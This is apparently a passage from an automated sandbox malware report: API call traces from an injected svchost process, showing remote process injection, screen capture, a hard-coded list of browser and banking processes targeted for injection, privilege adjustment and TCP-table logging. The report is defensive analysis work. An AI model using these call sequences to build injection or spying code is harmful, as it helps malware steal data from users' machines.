                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02664CFF
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02664D1E
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02664D3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02664D53
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02664D5F
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02664D7A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02664D8A
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02664DC4
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02664DE5
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02664E11
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02664E29
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02664E44
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02664E52
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02664E7A
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02664E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02664EA4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02664EB5
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02664ED6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02664EF2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02664F03
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 2650560580-3024904723
                                                                                                                                                                                                              • Opcode ID: c68d30ec91e91e0437cd394d3ef3517e5bed111e1902a11214b5deb50fb8eaa6
                                                                                                                                                                                                              • Instruction ID: 8ee3a30c152aad43281f93f1a677c8f0865187a6423df7711ad2400a957ee5d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c68d30ec91e91e0437cd394d3ef3517e5bed111e1902a11214b5deb50fb8eaa6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F618075A40305BFE720DF64CC88FBE77A8AF84B04F558519F9469B280DBB4D941CBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 026654B0
                                                                                                                                                                                                              • GetWindowDC.USER32(00000000), ref: 026654B7
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 026654C8
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 026654E1
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 026654E9
                                                                                                                                                                                                              • CreateDIBSection.GDI32(00000000,?,00000001,?,00000000,00000000), ref: 02665522
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0266552C
                                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 02665549
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0266554F
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02665559
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001020), ref: 0266556F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02665576
                                                                                                                                                                                                              • memset.MSVCRT ref: 0266558A
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 026655A5
                                                                                                                                                                                                                • Part of subcall function 02654170: GetProcessHeap.KERNEL32(00000008,02650BF7,02650BE3,?,02658A25,?,?,?), ref: 02654181
                                                                                                                                                                                                                • Part of subcall function 02654170: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02654188
                                                                                                                                                                                                                • Part of subcall function 02654170: memset.MSVCRT ref: 02654198
                                                                                                                                                                                                                • Part of subcall function 026541B0: GetProcessHeap.KERNEL32(00000000,00000000,6F9690B0,02650C69), ref: 026541BE
                                                                                                                                                                                                                • Part of subcall function 026541B0: HeapValidate.KERNEL32(00000000), ref: 026541C1
                                                                                                                                                                                                                • Part of subcall function 026541B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 026541CE
                                                                                                                                                                                                                • Part of subcall function 026541B0: RtlFreeHeap.NTDLL(00000000), ref: 026541D1
                                                                                                                                                                                                              • GetDIBits.GDI32(0265EEFB,00000000,00000000,?,00000000,00000000,00000000), ref: 026655F4
                                                                                                                                                                                                              • ReleaseDC.USER32(?,0265EEFB), ref: 0266566C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Window$BitsCapsCreateDesktopDevicememset$AllocAllocateCompatibleFreeObjectReleaseSectionSelectValidate
                                                                                                                                                                                                              • String ID: ($BM
                                                                                                                                                                                                              • API String ID: 3203594236-2980357723
                                                                                                                                                                                                              • Opcode ID: 2b15f7ecbc9e417ff685e568cecafa5fff2a8dddec76e246cf2732c754d5b513
                                                                                                                                                                                                              • Instruction ID: b5c28314d8fe6ba5179498d70efe290205f58dbee280d2669e71de3c577635b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b15f7ecbc9e417ff685e568cecafa5fff2a8dddec76e246cf2732c754d5b513
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 245171B1D40214BBDB109FA4DC49BAFBBB9EF48710F514619F906FB380DB7499408BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,76F92F00), ref: 02669991
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026699AD
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 026699BC
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 026699C9
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02669A08
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02669A16
                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,?), ref: 02669B0D
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 02669B1C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                              • API String ID: 2477558990-1591360731
                                                                                                                                                                                                              • Opcode ID: b8bdc2b61af2c91ff99b0ae50edc3623b9b5afdb690e717b81f71d93f3ad51e2
                                                                                                                                                                                                              • Instruction ID: fd01d0979ad050656c2bd6adfdcae7eac818b181a2d842fb72d57b571b5b33fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8bdc2b61af2c91ff99b0ae50edc3623b9b5afdb690e717b81f71d93f3ad51e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 405190B1509381ABD320DF54CC88BBBB7E9FB89704F084A0DFD8587240DB759948CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsNetworkAlive.SENSAPI(02646E0D,00000000), ref: 02654F93
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02654FA1
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 02654FAB
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654FC8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02654FE7
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02655000
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655013
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265502C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02655045
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02655058
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655065
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                              • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                              • API String ID: 1656757314-3977723178
                                                                                                                                                                                                              • Opcode ID: 739984732d8b0e9b8128f5f1502469013984f4fbd0b3be1678b7177489b16270
                                                                                                                                                                                                              • Instruction ID: 24316b2ca5839180325d01fdbf0a218821b04b25f49371a25e4e74a9e099c9f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 739984732d8b0e9b8128f5f1502469013984f4fbd0b3be1678b7177489b16270
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21D872A8431877EB20E6A4AC41FDEB76C9B54710F400695F689E61C0EAF1A6D48BD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02647FF1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02648002
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02648010
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02648019
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0264802F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02648041
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02648069
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02648082
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0264808D
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 02648099
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 026480A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                              • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$\explorer.exe
                                                                                                                                                                                                              • API String ID: 2248524772-792691438
                                                                                                                                                                                                              • Opcode ID: ff23d171ca73ef9f39de98b8ea5d388514593d3ea77bd7265a7d1d9d2e451702
                                                                                                                                                                                                              • Instruction ID: 94c004ae585fcb1a7fccdd16f8d46a39f1c78c638fff62b601ba2dacd7c8c815
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff23d171ca73ef9f39de98b8ea5d388514593d3ea77bd7265a7d1d9d2e451702
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3321D8319C13047BD321AB75DC45B2EB79CAF80F15F411B19F985A7280DFB4E8508AA7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 026578B4
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 026578D9
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000), ref: 026578FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02657917
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80,?,00000000), ref: 0265793B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02657941
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02657948
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80,?,00000000), ref: 02657977
                                                                                                                                                                                                                • Part of subcall function 02664880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02647F74), ref: 02664895
                                                                                                                                                                                                                • Part of subcall function 02664880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648AC
                                                                                                                                                                                                                • Part of subcall function 02664880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648CA
                                                                                                                                                                                                                • Part of subcall function 02664880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02647F74), ref: 026648E2
                                                                                                                                                                                                                • Part of subcall function 02664880: GetHandleInformation.KERNEL32(?,00000000), ref: 0266493B
                                                                                                                                                                                                                • Part of subcall function 02664880: CloseHandle.KERNEL32(?), ref: 0266494C
                                                                                                                                                                                                                • Part of subcall function 02664880: GetHandleInformation.KERNEL32(00000000,?), ref: 0266495E
                                                                                                                                                                                                                • Part of subcall function 02664880: CloseHandle.KERNEL32(00000000), ref: 0266496F
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0265798B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 026579A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 026579B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02657912
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                              • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                              • API String ID: 838372802-4199822264
                                                                                                                                                                                                              • Opcode ID: bdee22f7bd03bdbc5a09397ef9676baa2449de3d02c729d9adc966d87b88121f
                                                                                                                                                                                                              • Instruction ID: d4547c83204e5ff15d05f13958df52e3960fd1e88819ee0118ebf19baf5b7240
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdee22f7bd03bdbc5a09397ef9676baa2449de3d02c729d9adc966d87b88121f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1631AE30941225AFE721DFA5CC48BAEBBB8FF49754F514598E84A93240DB709A81CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 026479FC
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02647A0F
                                                                                                                                                                                                                • Part of subcall function 02664880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02647F74), ref: 02664895
                                                                                                                                                                                                                • Part of subcall function 02664880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648AC
                                                                                                                                                                                                                • Part of subcall function 02664880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648CA
                                                                                                                                                                                                                • Part of subcall function 02664880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02647F74), ref: 026648E2
                                                                                                                                                                                                                • Part of subcall function 02664880: GetHandleInformation.KERNEL32(?,00000000), ref: 0266493B
                                                                                                                                                                                                                • Part of subcall function 02664880: CloseHandle.KERNEL32(?), ref: 0266494C
                                                                                                                                                                                                                • Part of subcall function 02664880: GetHandleInformation.KERNEL32(00000000,?), ref: 0266495E
                                                                                                                                                                                                                • Part of subcall function 02664880: CloseHandle.KERNEL32(00000000), ref: 0266496F
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02647A1E
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02647A37
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02647A3E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 02647A54
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647A99
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02647AB3
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02647AC6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                              • String ID: 75775d6fa$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                              • API String ID: 1400009243-2133917647
                                                                                                                                                                                                              • Opcode ID: 87ee4c02411a615342f4f412f3663e4f31060488b47c2302ea0b2116b344966e
                                                                                                                                                                                                              • Instruction ID: 8bce666fe0ccdd3180e8d6511addc05d2d9bbdc001d10aa52d6133ccf604e701
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87ee4c02411a615342f4f412f3663e4f31060488b47c2302ea0b2116b344966e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8431B471980219ABDB21CE50DC84FAEB76CFF44B11F45054AFE8597280EBB09AD4CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: fda520745d00cf73535a3d7ceae4278d3dec3475d35e6a4a41af783693e08316
                                                                                                                                                                                                              • Instruction ID: a1a737847fd68231e997191e83f21432ad399c437c82caab8c88c25705402716
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fda520745d00cf73535a3d7ceae4278d3dec3475d35e6a4a41af783693e08316
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78115275A81204BBEB10EFE09C4EFBF7B7CEB04705F914658FA02E6180D770995487A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 02451451
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 02451515
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2611248672.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2450000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3550616410-0
                                                                                                                                                                                                              • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                              • Instruction ID: ab5f6e62bc21964c910fae9b1e6b463a2d8355c4441086c9ca3b0938e52c4271
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42914B71D00229AFCB20DFA9C840BAEB7B9AF88754F15455AEC4CB7706D734A901CF94

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 451 2644180-26441aa GetProcessHeap HeapAlloc 452 26441bc-2644217 451->452 453 26441ac-26441b9 memset 451->453 454 26444c5-26444cb 452->454 455 264421d-264422d GetTcpTable 452->455 453->452 456 2644290-2644292 455->456 457 264422f-264423d GetProcessHeap HeapValidate 455->457 458 2644294-26442a2 GetProcessHeap HeapValidate 456->458 459 26442bd-26442cb 456->459 460 264423f-2644245 GetProcessHeap HeapFree 457->460 461 264424b-2644252 457->461 458->454 464 26442a8-26442ba GetProcessHeap HeapFree 458->464 465 2644370-264437d call 26541b0 459->465 466 26442d1-26442ea GetProcessHeap HeapAlloc 459->466 460->461 462 2644254-264426a GetProcessHeap HeapAlloc 461->462 463 2644278-264427d 461->463 462->463 467 264426c-2644275 memset 462->467 463->454 468 2644283-264428a GetTcpTable 463->468 466->465 470 26442f0-2644303 memset 466->470 467->463 468->456 472 2644305-264430d 470->472 472->472 473 264430f-2644319 472->473 474 264431f 473->474 475 264442a-264442d 473->475 477 2644322-264432f call 2644090 474->477 476 2644430-2644436 475->476 476->476 478 2644438-264444d 476->478 482 2644415-2644424 477->482 483 2644335-2644342 call 2644090 477->483 480 2644450-2644455 478->480 480->480 484 2644457-2644462 480->484 482->475 482->477 490 2644344-2644355 GetProcessHeap HeapValidate 483->490 491 2644380-2644382 483->491 486 2644464-264449d SetFilePointer LockFile WriteFile UnlockFile 484->486 487 26444a3-26444b7 GetProcessHeap HeapValidate 484->487 486->487 487->454 489 26444b9-26444bf GetProcessHeap HeapFree 487->489 489->454 490->482 492 264435b-264436b GetProcessHeap HeapFree 490->492 493 2644385-264438a 491->493 492->482 493->493 494 264438c-26443e5 htons * 2 _snprintf GetProcessHeap HeapValidate 493->494 495 26443e7-26443ed GetProcessHeap HeapFree 494->495 496 
26443f3-2644404 GetProcessHeap HeapValidate 494->496 495->496 497 2644406-264440c GetProcessHeap HeapFree 496->497 498 2644412 496->498 497->498 498->482
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,76F93490), ref: 0264419D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026441A0
                                                                                                                                                                                                              • memset.MSVCRT ref: 026441B4
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02644224
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644232
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02644235
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644242
